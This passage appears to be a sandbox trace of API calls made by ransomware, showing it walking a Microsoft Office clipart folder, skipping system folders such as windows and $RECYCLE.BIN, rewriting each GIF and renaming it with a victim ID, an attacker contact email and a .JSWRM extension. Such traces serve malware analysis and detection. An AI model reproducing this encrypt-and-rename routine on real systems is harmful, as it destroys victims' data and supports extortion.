CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0080.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0080.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0080.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0080.006] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0080.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d290 [0080.006] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0080.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d290 | out: hHeap=0x1e0000) returned 1 [0080.006] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0080.006] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099194.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099194.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0080.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2109a8 | out: hHeap=0x1e0000) returned 1 [0080.007] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe5dee50, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x4dd3, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099195.GIF", cAlternateFileName="")) returned 1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2=".") returned 1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="..") returned 1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="...") returned 1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="windows") returned -1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="recovery") returned -1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="perflogs") returned -1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="documents and settings") returned 1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="system volume information") returned -1 [0080.007] lstrcmpiW (lpString1="J0099195.GIF", lpString2="msocache") returned -1 [0080.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241178 [0080.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099195.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099195.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099195.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241178 | out: hHeap=0x1e0000) returned 1 [0080.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413a8 [0080.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099195.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099195.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099195.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413a8 | out: hHeap=0x1e0000) returned 1 [0080.007] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x20ff90 [0080.007] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210878 | out: hHeap=0x1e0000) returned 1 [0080.007] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.008] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210d38 [0080.008] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.008] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=19923) returned 1 [0080.008] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.008] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x4dd0) returned 0x24d210 [0080.008] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x4dd0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x4dd0, lpOverlapped=0x0) returned 1 [0080.011] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.011] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x4dd0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x4dd0, lpOverlapped=0x0) returned 1 [0080.011] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.011] CloseHandle (hObject=0x314) returned 1 [0080.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.011] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.011] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a300 [0080.012] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a300, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a300 | out: hHeap=0x1e0000) returned 1 [0080.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0080.012] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0080.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0080.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.012] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099195.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099195.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0080.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.012] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210d38 | out: hHeap=0x1e0000) returned 1 [0080.012] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3801, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099196.GIF", cAlternateFileName="")) returned 1 [0080.012] lstrcmpiW (lpString1="J0099196.GIF", lpString2=".") returned 1 [0080.012] lstrcmpiW (lpString1="J0099196.GIF", lpString2="..") returned 1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="...") returned 1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="windows") returned -1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="recovery") returned -1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="perflogs") returned -1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="documents and settings") returned 1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="system volume information") returned -1 [0080.013] lstrcmpiW (lpString1="J0099196.GIF", lpString2="msocache") returned -1 [0080.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0080.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099196.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099196.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099196.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0080.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0080.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099196.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099196.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099196.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0080.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210a40 [0080.013] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.013] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210618 [0080.013] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.013] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=14337) returned 1 [0080.013] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.013] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3800) returned 0x24d210 [0080.013] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3800, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3800, lpOverlapped=0x0) returned 1 [0080.016] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.016] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3800, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3800, lpOverlapped=0x0) returned 1 [0080.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.016] CloseHandle (hObject=0x314) returned 1 [0080.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0080.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a498 [0080.016] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a498, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a498 | out: hHeap=0x1e0000) returned 1 [0080.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0080.016] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0080.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0080.016] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.016] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099196.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099196.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247d70 | out: hHeap=0x1e0000) returned 1 [0080.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0080.017] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210618 | out: hHeap=0x1e0000) returned 1 [0080.017] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe59294b, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe59294b, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe59294b, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2a92, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0099197.GIF", cAlternateFileName="")) returned 1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2=".") returned 1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="..") returned 1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="...") returned 1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="windows") returned -1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="recovery") returned -1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="perflogs") returned -1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="documents and settings") returned 1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="$RECYCLE.BIN") returned 1 [0080.017] lstrcmpiW (lpString1="J0099197.GIF", lpString2="system volume information") returned -1 [0080.018] lstrcmpiW (lpString1="J0099197.GIF", lpString2="msocache") returned -1 [0080.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0080.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099197.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099197.GIF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099197.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0080.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099197.GIF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0099197.GIF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0099197.GIF", lpUsedDefaultChar=0x0) returned 12 [0080.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2104e8 [0080.018] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210a40 | out: hHeap=0x1e0000) returned 1 [0080.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.018] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0080.018] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.018] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=10898) returned 1 [0080.018] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.018] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2a90) returned 0x24d210 [0080.018] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2a90, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2a90, lpOverlapped=0x0) returned 1 [0080.039] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.039] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2a90, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2a90, lpOverlapped=0x0) returned 1 [0080.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.039] CloseHandle (hObject=0x314) returned 1 [0080.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210450 [0080.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0080.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2e8 [0080.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2e8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2e8 | out: hHeap=0x1e0000) returned 1 [0080.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cd50 [0080.039] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247d70 [0080.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cd50 | out: hHeap=0x1e0000) returned 1 [0080.039] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0080.039] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0099197.GIF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0099197.gif.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.040] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, 